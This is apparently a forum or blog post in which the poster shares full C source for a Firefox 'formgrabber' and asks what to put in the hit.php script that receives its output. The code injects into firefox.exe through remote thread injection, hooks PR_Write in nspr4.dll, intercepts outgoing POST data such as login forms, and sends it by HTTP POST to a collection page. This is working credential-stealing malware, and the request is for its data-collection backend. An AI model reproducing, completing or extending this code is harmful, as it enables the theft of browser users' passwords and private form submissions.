formgrabber sourcecode c# output to hit.php what do i need in php script
to capture the postdata sent from formgrabber
I need to basically know what I sort of code I need to get the data from
hit.php from my running c source code
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include <wininet.h>
typedef HMODULE (WINAPI *GMH) (LPCTSTR);
typedef FARPROC (WINAPI *GPA) (HMODULE,LPCSTR);
typedef int (WINAPI *VP) (LPVOID,SIZE_T,DWORD,PDWORD);
typedef HINTERNET (WINAPI *IO) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
typedef HINTERNET (WINAPI
*IC)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
typedef HINTERNET (WINAPI *HOR)
(HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
typedef BOOL (WINAPI *HSR)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
typedef VOID (WINAPI *Slep)(DWORD);
typedef struct {
GMH GetMH; //GetModuleHandle
GPA GetPA; //GetProcAddress
VP SetVP; //VirtualProtect
Slep Slepx; //Sleep
char ModuleName[36]; //"nspr4.dll"
char Proc[36]; //"PR_Write"
BYTE *PR_Write;
BYTE *nptr;
DWORD *bptr;
DWORD OldProtect;
char blank[3];
char localhost[16];
char post[10];
char visit[16];
char header[64];
HINTERNET OpenHandle;
HINTERNET ConnectHandle;
HINTERNET Handle;
int nLen;
char *pVar;
IO IOx;
IC ICx;
HOR HORx;
HSR HSRx;
} Inject_Data;
void Hook(Inject_Data *pData);
int main() {
Inject_Data Data;
LPVOID Mem,Prm;
HANDLE rThread;
HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 ProcessInfo;
ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
LoadLibrary("wininet.dll");
Data.GetMH =(GMH)
GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleHandleA");
Data.GetPA =
(GPA)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
Data.IOx =
(IO)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetOpenA");
Data.ICx =
(IC)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetConnectA");
Data.HORx =
(HOR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpOpenRequestA");
Data.HSRx =
(HSR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpSendRequestA");
Data.SetVP =
(VP)GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualProtect");
Data.Slepx = (Slep)GetProcAddress(GetModuleHandle("kernel32.dll"),"Sleep");
wsprintf(Data.ModuleName,"nspr4.dll");
wsprintf(Data.Proc,"PR_Write");
wsprintf(Data.localhost,"localhost");
wsprintf(Data.post,"POST");
wsprintf(Data.visit,"/hit.php");
wsprintf(Data.header,"Content-Type:application/x-www-form-urlencoded");
wsprintf(Data.blank,"");
while(Process32Next(handle, &ProcessInfo))
{
if(!strcmp(ProcessInfo.szExeFile, "firefox.exe"))
{
handle = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessInfo.th32ProcessID);
Prm =
VirtualAllocEx(handle,NULL,sizeof(Data),MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
WriteProcessMemory(handle,Prm,&Data,sizeof(Data),NULL);
Mem =
VirtualAllocEx(handle,NULL,2000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(handle,Mem,Hook,2000,NULL);
rThread =
CreateRemoteThread(handle,NULL,0,(LPTHREAD_START_ROUTINE)Mem,Prm,0,NULL);
WaitForSingleObject(rThread, INFINITE);
CloseHandle(handle);
}
}
return 0;
}
void Hook(Inject_Data *pData) {
BYTE *temp;
goto start;
Hooked:
__asm{
mov ecx,[esp+0xC]
mov eax,[esp+0x8]
cmp dword ptr[eax],0x54534F50 // POST?
jne prexJMP //its not POST
push ecx
call getDelta4 //Get the delta
getDelta4:
pop ecx
sub ecx,offset getDelta4
lea eax,Data
add eax,ecx
pop ecx
mov eax,[eax]
mov pData,eax
mov eax,[esp+0x8]
mov temp,eax
}
pData->pVar = temp;
__asm{ nop }
__asm{ mov ecx,[esp+0xC] }
__asm{ mov temp,ecx }
__asm{ nop }
pData->nLen = temp;
__asm{ nop }
*pData->pVar = 0x72;
pData->pVar++;
*pData->pVar = 0x3D;
pData->pVar--;
pData->Handle =
pData->ICx(pData->OpenHandle,pData->localhost,8080,pData->blank,pData->blank,INTERNET_SERVICE_HTTP,0,0);
pData->ConnectHandle =
pData->HORx(pData->Handle,pData->post,pData->visit,NULL,NULL,NULL,INTERNET_FLAG_KEEP_CONNECTION,0);
pData->HSRx(pData->ConnectHandle,pData->header,-1L,pData->pVar,pData->nLen);
*pData->pVar = 0x50;
pData->pVar++;
*pData->pVar = 0x4F;
pData->pVar--;
prexJMP:
__asm{
MOV EAX,DWORD PTR [ESP+4]
MOV ECX,DWORD PTR [EAX] }
xJMP:
__asm{ jmp ExitProcess }
Data:
__asm{ nop
nop
nop
nop
}
start:
pData->PR_Write = (BYTE*)
pData->GetPA(pData->GetMH(pData->ModuleName),pData->Proc);
pData->SetVP(pData->PR_Write,6,PAGE_EXECUTE_READWRITE,&pData->OldProtect);
//ptr = (BYTE*) Hooked;
__asm{ push ecx }
__asm{ call getDelta } //Get the delta
__asm{ getDelta: }
__asm{ pop ecx }
__asm{ sub ecx,offset getDelta }
__asm{ push eax }
__asm{ lea eax,Hooked }
__asm{ add eax,ecx }
__asm{ mov temp,eax }
__asm{ pop eax }
__asm{ pop ecx }
pData->nptr = temp;
pData->nptr = pData->nptr - pData->PR_Write;
pData->nptr = pData->nptr - 5;
*pData->PR_Write = 0xE9;
pData->PR_Write++;
pData->bptr = (DWORD*) pData->PR_Write;
*pData->bptr = (DWORD) pData->nptr;
pData->PR_Write = pData->PR_Write + 4;
*pData->PR_Write = 0xCC;
pData->PR_Write++;
__asm{ push ecx }
__asm{ call getDelta1 } //Get the delta
__asm{ getDelta1: }
__asm{ pop ecx }
__asm{ sub ecx,offset getDelta1 }
__asm{ push eax }
__asm{ lea eax,xJMP }
__asm{ add eax,ecx }
__asm{ mov temp,eax }
__asm{ pop eax }
__asm{ pop ecx }
pData->nptr = temp;
pData->PR_Write = pData->PR_Write - pData->nptr;
pData->PR_Write = pData->PR_Write - 5;
pData->nptr++;
pData->OldProtect = 0;
pData->SetVP(pData->nptr,10,PAGE_EXECUTE_READWRITE,&pData->OldProtect);
pData->bptr = (DWORD*) pData->nptr;
*pData->bptr = (DWORD) pData->PR_Write;
temp = (BYTE *) pData;
__asm{ push ecx }
__asm{ call getDelta2 } //Get the delta
__asm{ getDelta2: }
__asm{ pop ecx }
__asm{ sub ecx,offset getDelta2 }
__asm{ push eax }
__asm{ push ebx }
__asm{ lea eax,Data }
__asm{ add eax,ecx }
__asm{ mov ebx,temp }
__asm{ mov dword ptr[eax],ebx }
__asm{ pop ebx }
__asm{ pop eax }
__asm{ pop ecx }
/*start the connection */
pData->OpenHandle =
pData->IOx(pData->localhost,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
for(;<imgsrc='http://www.rohitab.com/discuss/public/style_emoticons/<#EMO_DIR#>/wink.gif'
class='bbc_emoticon' alt=';)' /> { pData->Slepx(1000); }
}
here is the c script above ............
all I need to know what do I need in my php script
my php is blank like illustrated below
hit.php
<?php
?>
No comments:
Post a Comment